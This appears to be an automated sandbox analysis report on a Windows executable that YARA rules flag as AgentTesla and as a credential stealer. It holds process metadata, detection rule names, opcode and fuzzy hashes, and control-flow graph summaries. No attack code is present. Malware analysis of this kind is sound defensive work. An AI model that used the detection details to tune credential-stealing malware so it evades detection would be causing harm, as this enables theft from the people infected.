                                                Commandline:"C:\Users\user\Desktop\pE7icjUisS.exe"
                                                Imagebase:0xb30000
                                                File size:239'104 bytes
                                                MD5 hash:95C864E4A99B56F70FE18081066ED7B3
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.3856454499.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1394478448.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000000.1394478448.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3856454499.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.3856454499.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false
                                                  Execution Graph

                                                  Execution Coverage:7.7%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:3
                                                  Total number of Limit Nodes:0
                                                  execution_graph: 0x626e180 -> 0x626e1c6 (GlobalMemoryStatusEx) -> 0x626e1f6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3858309771.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6260000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a6cae83fa977c851a5b7c03d0ffa0fc27e9f2d62ce6337d8edab8d70bed74da0
                                                  • Instruction ID: 8096961e1c84fad304675a67c2ca604ae870a88ae2e78629fd8a3f32cb37a611
                                                  • Opcode Fuzzy Hash: a6cae83fa977c851a5b7c03d0ffa0fc27e9f2d62ce6337d8edab8d70bed74da0
                                                  • Instruction Fuzzy Hash: B5825D30E10615CFDB64DF65C544A9DB7B2FF85300F54C6AAE849AB264EB70ED85CB80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3858309771.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6260000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6ba675ab2eb19999e3a934756d91c2c1f37caec52eec02ade98c7217fb83f172
                                                  • Instruction ID: c4b1c4f32fd56754b036cd705f6ccf098ff0b710ea21d46b7f39f33f11a107f7
                                                  • Opcode Fuzzy Hash: 6ba675ab2eb19999e3a934756d91c2c1f37caec52eec02ade98c7217fb83f172
                                                  • Instruction Fuzzy Hash: 78627F34B102158FDB64EB6AD5806AEBBF2EF84314F14C569E845DB394DB71EC82CB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3858309771.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6260000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5568933725bb850ccb27906969db1d4a2b1ea1d4cfce1bdf63ac3eaf8bac5eb9
                                                  • Instruction ID: cd7586da560205df379a6bd634df22d9e3bb6ec2a3d9e3f50cbf21dd4aabc1b4
                                                  • Opcode Fuzzy Hash: 5568933725bb850ccb27906969db1d4a2b1ea1d4cfce1bdf63ac3eaf8bac5eb9
                                                  • Instruction Fuzzy Hash: 7B224370E2020A8FEF64DB69D4907AEB7B6EB89310F204526F815DB395DA35DCC1CB61

                                                  Control-flow Graph

                                                  control_flow_graph: function at 0x6262af8 (basic-block edge list not reproduced; no API or sub-function calls appear in the graph)
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3858309771.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6260000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b5c2339787033a648406bcbaf3beed6b6a8d1436e5164980159ec7d8df9cbfb8
                                                  • Instruction ID: a7697b7999d45bb551aefc56d7bd374b1fa1ba27582adb7fed30311caffb9676
                                                  • Opcode Fuzzy Hash: b5c2339787033a648406bcbaf3beed6b6a8d1436e5164980159ec7d8df9cbfb8
                                                  • Instruction Fuzzy Hash: 1B22B331E11216CFDF64DBA9C4807AEBBB2FF85310F248569E845AB394DA35DD81CB90

                                                  Control-flow Graph

                                                  control_flow_graph: function at 0x626bcd8 (basic-block edge list not reproduced; calls sub_6263ee0 from blocks 0x626be4d and 0x626c3b6)
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3858309771.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6260000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: afd5199c8e6c7aece8aec650b54b132990d1661464b7b8be64c7c2b4d0c18340
                                                  • Instruction ID: 2a983cac0c328e78f684ddc2417b491578d42a17495f03f93a3504d6742b367f
                                                  • Opcode Fuzzy Hash: afd5199c8e6c7aece8aec650b54b132990d1661464b7b8be64c7c2b4d0c18340
                                                  • Instruction Fuzzy Hash: 3722A330B102058FDB54EB69D494B6DB7F2EF88311F108569E806DB365DB75EC82CB91

                                                  Control-flow Graph

                                                  control_flow_graph: function at 0x62656c0 (basic-block edge list not reproduced; calls sub_6261ae0 from block 0x6265813 and sub_6263ee0 from blocks 0x6265b41 and 0x626590f)
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3858309771.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6260000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6728d3a8fb34e988f4c4fee7f8116af84c67da9e6f04d5e6b5e19b3baa8f82b2
                                                  • Instruction ID: 0f550a3e26fc22d2e1ccc234146edbc68d26fa7f1fdf761ee4c5452cb45b92a5
                                                  • Opcode Fuzzy Hash: 6728d3a8fb34e988f4c4fee7f8116af84c67da9e6f04d5e6b5e19b3baa8f82b2
                                                  • Instruction Fuzzy Hash: 89029130B102158FDB54DB6AD99076EBBF2FF84314F148569E806AB395DB31ED82CB90

                                                  Control-flow Graph

                                                  control_flow_graph: function at 0x626dc00 (basic-block edge list not reproduced; calls sub_626d460 and sub_626d294 from block 0x626dc24 and sub_6261ae0 from block 0x626df94; block 0x626dd3f fans out to 16 successor blocks, 15 of which converge on 0x626df9d)
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3858309771.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6260000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5ce2420d903279fc0cf1afa9470d14b9e38baeed6cbca0b528ed5f0d992e4f20
                                                  • Instruction ID: fb3a6644ffd7721d31f16bb63271b6ba3c514e2291aeddbb2ccf6280302e4e03
                                                  • Opcode Fuzzy Hash: 5ce2420d903279fc0cf1afa9470d14b9e38baeed6cbca0b528ed5f0d992e4f20
                                                  • Instruction Fuzzy Hash: 9CB1B074F143188FDB98AB75985427E7BA3AFC8700B15892EF806DB399DE34CC428791

                                                  Control-flow Graph

                                                  control_flow_graph: function at 0x14d4a60 (basic-block edge list not reproduced; calls sub_14d0ab8 from blocks 0x14d4d91 and 0x14d4da5; contains several single-block self-loops)
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ce1766b349cc12d80ba1a516a8ebabd23699acb4fdf659029a29547f02849726
                                                  • Instruction ID: 086694e32db2012eb42f9badbe6e55e295f93d8c073a2e998beeee11a00517bd
                                                  • Opcode Fuzzy Hash: ce1766b349cc12d80ba1a516a8ebabd23699acb4fdf659029a29547f02849726
                                                  • Instruction Fuzzy Hash: F6B17070E003098FDF14CFA9D9957AEBBF2AF48714F18852AD415E77A4EB749842CB81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fded6d6fefe57ec40a33cf8a43c165c49a298a0f36778f076bc69f51a320db75
                                                  • Instruction ID: 253ab871671dde1457703ebe48958048ac4e4b960810cf02e7901241e88e53e3
                                                  • Opcode Fuzzy Hash: fded6d6fefe57ec40a33cf8a43c165c49a298a0f36778f076bc69f51a320db75
                                                  • Instruction Fuzzy Hash: 94914EB0E003099FDF15CFA9C9A579EBBF2BF48314F18812AE415A73A4DB749845CB91

                                                  Control-flow Graph

                                                  control_flow_graph: function at 0x626e167 (blocks 0x626e167, 0x626e1c6 [GlobalMemoryStatusEx], 0x626e1f6, 0x626e1fd; the API block branches to both 0x626e1f6 and 0x626e1fd)
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNEL32(8B55054C), ref: 0626E1E7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3858309771.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6260000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: c051003b3fb43229853fcd0abda1cdba21c0eafa8ed784bf6943192cf22911ce
                                                  • Instruction ID: 27db27f40f46a7eabdbbc933792f5e4af2eaba3b2a57e9f6e50d16dd3f298c74
                                                  • Opcode Fuzzy Hash: c051003b3fb43229853fcd0abda1cdba21c0eafa8ed784bf6943192cf22911ce
                                                  • Instruction Fuzzy Hash: 0D216AB5C002599FCB10CF9AC444BDEFBF0AF48310F11816AE818A7340D7785941CFA1

                                                  Control-flow Graph

                                                  control_flow_graph: function at 0x626e180 (blocks 0x626e180 [GlobalMemoryStatusEx], 0x626e1f6, 0x626e1fd; the API block branches to both 0x626e1f6 and 0x626e1fd)
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNEL32(8B55054C), ref: 0626E1E7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3858309771.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6260000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 474abc558f5cf6dc85351835e416449b307cd8e251c2a302d564c97fa2b1d02e
                                                  • Instruction ID: 8b56856c4b730acdbf595067c82a17d89774a36e32e50b4e57f9fddec5f6bdaa
                                                  • Opcode Fuzzy Hash: 474abc558f5cf6dc85351835e416449b307cd8e251c2a302d564c97fa2b1d02e
                                                  • Instruction Fuzzy Hash: 941123B1C0025A9BCB10DF9AC845BDEFBF4AF48320F11816AE818A7240D778A941CFA1

                                                  Control-flow Graph

                                                  control_flow_graph: function at 0x14d7990 (basic-block edge list not reproduced; long straight-line chain of conditional blocks; indirect call at 0x14d7f32 resolved to sub_14d91d9, sub_14d91e8 or sub_14d928b; back-edge from block 0x14d8164 to 0x14d79a9 forms the outer loop)
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9c7df9c6492d8e7f1cb3383c48902a922ce2342196599ec3ce5ffa8a151c1c30
                                                  • Instruction ID: 2881a7c1a879dcdffecef52f0b9dfee34d6710b1979bd5e6c083f38612821711
                                                  • Opcode Fuzzy Hash: 9c7df9c6492d8e7f1cb3383c48902a922ce2342196599ec3ce5ffa8a151c1c30
                                                  • Instruction Fuzzy Hash: 09125174B413128BDF29AB29E49422D76A2FBD9606B508A3FD105CF769CF31EC4687C1

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 030f8c9d9b3dcc51219f7f45744c63dd6996eb0796022fc858a3505eac667133
                                                  • Instruction ID: 84f43a46c0f7cb6c5b5f8bad61dd97373ec6aabb11919eebce6cbf0b4ea1d85e
                                                  • Opcode Fuzzy Hash: 030f8c9d9b3dcc51219f7f45744c63dd6996eb0796022fc858a3505eac667133
                                                  • Instruction Fuzzy Hash: E1D19E75A002058FDF14DFA9D8907AEBBB2FF88314F10856AE909DB3A5D771D841CB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dbccc8192db6b4f78f12bf01ce91b3afe4eed6b930ca40b148967321ac86d306
                                                  • Instruction ID: c785c0e18c9e48ac41bd6e08eee69936e657d966f80009161d630fd748e67186
                                                  • Opcode Fuzzy Hash: dbccc8192db6b4f78f12bf01ce91b3afe4eed6b930ca40b148967321ac86d306
                                                  • Instruction Fuzzy Hash: A6D18D74A002058FDF19DF69D494AAEBBB2FF88314F11856AE506EB365DB70DC42CB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4b423b3c85c8dfe0005d1c8f48a9b17d66ad029084a68a1e6d9352b72f9c50cf
                                                  • Instruction ID: 0a08d5550cc3e1448bdc6c618291067e4a39beea9dc687abcc93c23cc4b65536
                                                  • Opcode Fuzzy Hash: 4b423b3c85c8dfe0005d1c8f48a9b17d66ad029084a68a1e6d9352b72f9c50cf
                                                  • Instruction Fuzzy Hash: A8B17070E00209CFDF10CFA9D9957AEBBF1AF48714F18812AE415A7764EB749846CB81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fba6953e33350bb488e2d88f907bc56c970dab636a1c5d477ee93a88e5bd5a10
                                                  • Instruction ID: 2505a50ccbd8f8d9a77ca95f5e8759d9fc2102f9cb6a00f9bda4bd6bac5a4def
                                                  • Opcode Fuzzy Hash: fba6953e33350bb488e2d88f907bc56c970dab636a1c5d477ee93a88e5bd5a10
                                                  • Instruction Fuzzy Hash: ACA15CB0E00209DFDF11CFA9D9A579EBBF1BF48314F18812AE415A73A4DB749845CB92
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cd9111b37c35b1337d0e6135344f0242e798be74db2cc3173be333380c59e693
                                                  • Instruction ID: d0c4b16852d6635462156c562357fddf574c88ea6f679f1f214d6a3fe20f7806
                                                  • Opcode Fuzzy Hash: cd9111b37c35b1337d0e6135344f0242e798be74db2cc3173be333380c59e693
                                                  • Instruction Fuzzy Hash: 7B714A70E00349CFDF14DFA9C8957AEBBF1AF88710F18812AE415A7764DB749842CB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4928712a1672c86f1381def4fdb7dbf196d2d235ebc87b381cabbe5adc91216d
                                                  • Instruction ID: 210f74b2951476688f1ccfd9bd119dc6cb4594d27e24ed4c097d6767dcdea7a8
                                                  • Opcode Fuzzy Hash: 4928712a1672c86f1381def4fdb7dbf196d2d235ebc87b381cabbe5adc91216d
                                                  • Instruction Fuzzy Hash: F8714E70E00349DFDF14DFA9C8957AEBBF2AF88314F18812AE415A7764DB749841CB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 343fc0f83c9eddf6b3a424b2d2cf73f223853a3d50696bcfac7b43e8f4d9a389
                                                  • Instruction ID: 1b874886186f3b1c0bcb6c01a82e1d0b8bd90f98fb737e3d90ba3825a67d2bc2
                                                  • Opcode Fuzzy Hash: 343fc0f83c9eddf6b3a424b2d2cf73f223853a3d50696bcfac7b43e8f4d9a389
                                                  • Instruction Fuzzy Hash: 9A51C330A106098FDF15CB69C4607AF7BB1EF95301F5184AEE405DB3A1EB71D846CB40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 933bdcde2e1f9929448ab536362cd83efd23a478153749128d9bb8b0527b0fc6
                                                  • Instruction ID: ba0f089d302ce21b01738f6c8f4b62129cfd192b188489cd51c123bfc9bae3b3
                                                  • Opcode Fuzzy Hash: 933bdcde2e1f9929448ab536362cd83efd23a478153749128d9bb8b0527b0fc6
                                                  • Instruction Fuzzy Hash: 2A512830A003048FDB64DFA8D554B9EB7F1FF49714F2045AAD40A9B3A1DB75AD46CB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 46448a11873a087b7beb3dfcdb4a6ded739b53c2cd683f831984068758e2fc38
                                                  • Instruction ID: 4091ab6f5cb2c6aa49b841375a611f52b0e50771de7c9a8d235db727c844bca4
                                                  • Opcode Fuzzy Hash: 46448a11873a087b7beb3dfcdb4a6ded739b53c2cd683f831984068758e2fc38
                                                  • Instruction Fuzzy Hash: 52512370D002188FDF14CFA9D8A4B9EFBB2BF48310F15812AE819AB365D774A845CF91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 78bd5749b54deaa68f83c21087827ab0f28ecc6a0e41d9dbf29486d6050792f3
                                                  • Instruction ID: 0e5e1b510cadacded286d975c85bf36a50afa4eca2efdfcd13e379bf83170a9a
                                                  • Opcode Fuzzy Hash: 78bd5749b54deaa68f83c21087827ab0f28ecc6a0e41d9dbf29486d6050792f3
                                                  • Instruction Fuzzy Hash: 22511370D002188FDF18CFA9D894B9EFBB1BF48310F15852AE819AB365DB74A845CF95
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 08434a6427730d75e8489483a5d947b41332be28508ed4baabb320bc0fdc8441
                                                  • Instruction ID: f105528401671fb86b346d5530ba0debcc961260b9d0688ed8e6c614fb44f3f4
                                                  • Opcode Fuzzy Hash: 08434a6427730d75e8489483a5d947b41332be28508ed4baabb320bc0fdc8441
                                                  • Instruction Fuzzy Hash: 01417D75B00615AFDB06CB78C850A3BBB66ABC8300B15C156E4458B2A9CB35E847C790
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 814dba526cca88249b9762287dd01534df69b819a01a22514fd3d4e3342b76e8
                                                  • Instruction ID: e38b141ff2b962bd9966175fb00c8debdfd41aa5f117094b2f93e5dee6738e81
                                                  • Opcode Fuzzy Hash: 814dba526cca88249b9762287dd01534df69b819a01a22514fd3d4e3342b76e8
                                                  • Instruction Fuzzy Hash: 5841E071B002018FDF259F38D56466F7BA2AB89600B64457EC403DB3AAEE31DC4BCB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ca5ecf1c0e8eefc322b345a3dfee8cd81493b0ca82e90f8aa1d7305350fe0f76
                                                  • Instruction ID: e43c991502042793bfe2a1f859bc666a1091b4cb31514501eb30fcb41a8e7394
                                                  • Opcode Fuzzy Hash: ca5ecf1c0e8eefc322b345a3dfee8cd81493b0ca82e90f8aa1d7305350fe0f76
                                                  • Instruction Fuzzy Hash: 1341C131B00211CFEF15EB79D5657AE77F2EB88600F10096AEA06E73A1DB359D42CB80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8ef4f6fdba06426cc9f7962bb8201cd0378f0a4fe5700af2920fa252439ec84e
                                                  • Instruction ID: 323d9e4172bc51c08a8977c274e1ce72edf018f733af905229f89a48f7231861
                                                  • Opcode Fuzzy Hash: 8ef4f6fdba06426cc9f7962bb8201cd0378f0a4fe5700af2920fa252439ec84e
                                                  • Instruction Fuzzy Hash: 4951F0396013668FCB2EEF3AF984A557F61B7653053089F69D2004B23EDA707949DB81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0ae4461e2163ebb9afe6fca13b18e37a2a4469283eb394ae68df4d092281ffe2
                                                  • Instruction ID: a361341e7a6e22f838057183c571b466527e7709c2e793123861bdd0ab676468
                                                  • Opcode Fuzzy Hash: 0ae4461e2163ebb9afe6fca13b18e37a2a4469283eb394ae68df4d092281ffe2
                                                  • Instruction Fuzzy Hash: 0341EE396013668FCB2EFF3AF984A453B61B7653053089F69D2004B23DDA707909DBC1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1ccf90ea8eefa7d6665cf8013367f7901aa20b616dc1a0ccc541df9a5591be3f
                                                  • Instruction ID: 9e8e4ae5bc9592a42c0b2c314962e30f649e75219d37b94edc909a9f5a38330e
                                                  • Opcode Fuzzy Hash: 1ccf90ea8eefa7d6665cf8013367f7901aa20b616dc1a0ccc541df9a5591be3f
                                                  • Instruction Fuzzy Hash: 8E318E70E106098BDF25CFA9C46079EBBB1FF85305F61856AE405EB391E771E882CB80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 70a650eaf322c0f8caa4a3b9474bde8106a9da3354d40f8231b3d560c17e8c43
                                                  • Instruction ID: 40038ed649f05d6d5fbc16943dbe63534a746c1ed45eba04a777ae2e888d448e
                                                  • Opcode Fuzzy Hash: 70a650eaf322c0f8caa4a3b9474bde8106a9da3354d40f8231b3d560c17e8c43
                                                  • Instruction Fuzzy Hash: 82313335A146058BDB29DF69D49469FBBB2AF89300F10C52AE806E7365DF709C46CB50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7ab56ae6ea4bef061b13d388c5e18b4cfe97868f9c7cdbe49f71908222b974e8
                                                  • Instruction ID: 9443e7742071baf89b88661f6cf3845c3c8d512451fa1aa89543d3912f635a3a
                                                  • Opcode Fuzzy Hash: 7ab56ae6ea4bef061b13d388c5e18b4cfe97868f9c7cdbe49f71908222b974e8
                                                  • Instruction Fuzzy Hash: A041E3B0D00349DFDB24DFA9C494ADEBBB5BF48310F14802AE819AB250DB759946CF90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fb9687ab5f960697040398d8578d6c0545ace3688131c219ecd30a687df5b379
                                                  • Instruction ID: a6a43d0bcd6b1aa51f94e3db71c30dfb94fe56581b86ada251c35015f02f49e5
                                                  • Opcode Fuzzy Hash: fb9687ab5f960697040398d8578d6c0545ace3688131c219ecd30a687df5b379
                                                  • Instruction Fuzzy Hash: 14312D34A106059BDB29DF69D49469FBBB2AF89300F10C52AE806EB365DF70E846CB50
                                                  Memory Dump Source
